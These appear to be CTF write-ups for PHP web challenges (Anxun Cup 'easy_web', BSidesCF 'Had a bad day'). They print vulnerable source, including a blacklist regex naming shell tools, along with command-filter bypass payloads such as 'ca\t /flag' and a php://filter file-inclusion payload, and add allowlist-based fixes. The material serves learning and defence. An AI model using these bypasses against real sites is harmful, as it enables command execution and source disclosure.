[Wangding Cup 2020 Zhuque Group] phpweb
[Anxun Cup 2019] easy_web
1. On opening the page, notice the value of the img parameter.
- Decode it with the right (and most capable) decoding tool
- Decoding with HackBar
The page has a function that fetches file contents; try encoding a path to fetch index.php.
Decoding the returned image's base64 data with the base64 tool gives the key source of index.php:
```php
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}
?>
```
The key img part:
```php
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64," . $txt . "'></img>";
```
This only outputs the file's contents as image data; it is unrelated to getting the flag.
The key cmd part:
```php
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}
```
- Command-execution bypass with a backslash
\t is escaped automatically, which bypasses the regex (that's how I understand it)
Payloads used:
l\s
l\s%20/
ca\t %20/flag
sor\t%20/flag*
2. MD5 collision
```php
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b']))
```
The special part here is that the values have to go through two rounds of URL encoding and still have equal MD5 hashes.
The POST data is URL-decoded once.
I was stuck here for a long time, all because of the values of a and b.
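An added example (PHP; not part of the challenge source or this writeup) showing why the cmd blacklist above is bypassable and what an allowlist replacement looks like. The regex is copied verbatim from the challenge; `ALLOWED_COMMANDS`, `blacklistRejects` and `runAllowlisted` are names made up for this illustration.

```php
<?php
// Added example, not the challenge's code.
//
// The exact regex from the challenge. Inside a PHP double-quoted string the
// fragment "\\|\\\\|" becomes the regex text  \|\\|  which PCRE reads as ONE
// alternative: a literal '|' immediately followed by a literal backslash.
// A backslash on its own therefore never matches, while the shell simply
// drops an unescaped backslash, so "l\s" is executed as "ls". Blacklists
// fail exactly like this: the attacker only needs one spelling you forgot.
const CMD_BLACKLIST = "/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i";

function blacklistRejects(string $cmd): bool
{
    return preg_match(CMD_BLACKLIST, $cmd) === 1;
}

// Allowlist version: the user chooses a key, the server owns the argv.
// No user-supplied text ever reaches the shell. (Hypothetical table.)
const ALLOWED_COMMANDS = [
    'uptime' => ['uptime'],
    'date'   => ['date', '-u'],
];

function runAllowlisted(string $key): ?string
{
    if (!array_key_exists($key, ALLOWED_COMMANDS)) {
        return null;   // unknown key: refuse outright, do not try to "sanitise"
    }
    $argv = array_map('escapeshellarg', ALLOWED_COMMANDS[$key]);
    return shell_exec(implode(' ', $argv));
}

var_dump(blacklistRejects('ls'));     // bool(true)  - blocked as intended
var_dump(blacklistRejects('l\\s'));   // bool(false) - passes, yet the shell runs "ls"
var_dump(runAllowlisted('l\\s'));     // NULL        - not an allowed key
var_dump(is_string(runAllowlisted('uptime')));  // bool(true)
```

The detection angle follows from the same observation: a backslash inside a short command string, or a command parameter that differs from the set of values the application is known to emit, is a useful signal in web access logs for this kind of filter bypass.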
[BSidesCF 2020] Had a bad day
1. It is a file inclusion, but none of the usual tricks work. Tried /var/www/html/index.php
Found that a .php suffix is appended automatically
So I removed the .php; the resulting recursion almost crashed my computer
Try a different approach
How did I not notice this at the time?
The correct approach:
?category=php://filter/convert.base64-encode/resource=index
Got the source:
```php
<?php
$file = $_GET['category'];
if(isset($file))
{
    if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
        include ($file . '.php');
    }
    else{
        echo "Sorry, we currently only support woofers and meowers.";
    }
}
?>
```
// the parameter must contain the string woofers, meowers or index
// .php is appended to the parameter
The page otherwise responds: Sorry, we currently only support woofers and meowers.
Since only those two strings are supported and this is a file inclusion, try putting one of them in the path:
/woofers/…/…/flag
payload:
?category=php://filter/convert.base64-encode/woofers/resource=flag
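An added example (PHP; not the challenge's code) that puts the substring check from the source above next to an allowlisted version and runs both over a few constructed inputs. The function names `substringCheckAccepts` and `allowlistResolve`, the `$pages` table and the input strings are all made up for this illustration.

```php
<?php
// Added example, not the challenge's code.

// Verbatim logic of the challenge: any string that merely *contains* one of
// the words passes, so a php://filter wrapper or a ../ path both get through.
function substringCheckAccepts(string $file): bool
{
    return strpos($file, "woofers") !== false
        || strpos($file, "meowers") !== false
        || strpos($file, "index");   // loose check: offset 0 is falsy, so a bare "index" is rejected
}

// Hardened version: the parameter is a key into a fixed table of real pages
// (hypothetical table). Anything else, wrappers and traversal included, is
// refused before include() is ever reached.
function allowlistResolve(string $file): ?string
{
    static $pages = [
        'woofers' => 'woofers.php',
        'meowers' => 'meowers.php',
    ];
    return $pages[$file] ?? null;
}

// Constructed inputs: one legitimate value, the wrapper payload from the
// writeup, a traversal-style path, and a bare "index".
$inputs = [
    'woofers',
    'php://filter/convert.base64-encode/woofers/resource=flag',
    '../../woofers',
    'index',
];

foreach ($inputs as $in) {
    printf("%-58s substring:%-6s allowlist:%s\n",
        $in,
        substringCheckAccepts($in) ? 'accept' : 'reject',
        allowlistResolve($in) ?? 'reject');
}
// Expected: only 'woofers' is accepted by both; the wrapper and traversal
// inputs pass the substring check but are rejected by the allowlist.
```

The allowlist also removes the need for the `.php` concatenation trick to carry any security weight: since the resolved filename is a server-side literal, `php://` stream wrappers and `convert.base64-encode` source disclosure are simply unreachable through this parameter.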